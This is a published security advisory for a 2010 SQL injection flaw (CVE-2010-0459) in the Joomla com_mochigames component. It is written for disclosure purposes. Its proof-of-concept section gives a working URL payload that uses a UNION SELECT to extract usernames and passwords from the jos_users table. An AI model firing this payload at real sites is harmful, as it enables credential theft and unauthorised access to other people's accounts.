Topic : | Joomla (com_mochigames) SQL Injection Vulnerability
|
SecurityAlert : 6987
CVE : CVE-2010-0459
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : B-HUNT3|2
Published : 31.01.2010
Affected Software : | yoflash:com_mochigames:0.51 |
 Advisory Content : [~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> TITLE: Joomla (com_mochigames) SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 0.51 but probably other versions
also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> PROOF OF CONCEPT:
[~]>>
http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=[SQL]&option=com_m
ochigames&Itemid=80
[~]>>
http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+sel
ect+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%
23&option=com_mochigames&Itemid=80
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!
[~]>> ...[END ADVISORY]...
References :
http://xforce.iss.net/xforce/xfdb/55841
http://www.securityfocus.com/bid/37931
http://www.exploit-db.com/exploits/11243
http://packetstormsecurity.org/1001-exploits/joomlamochigames-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|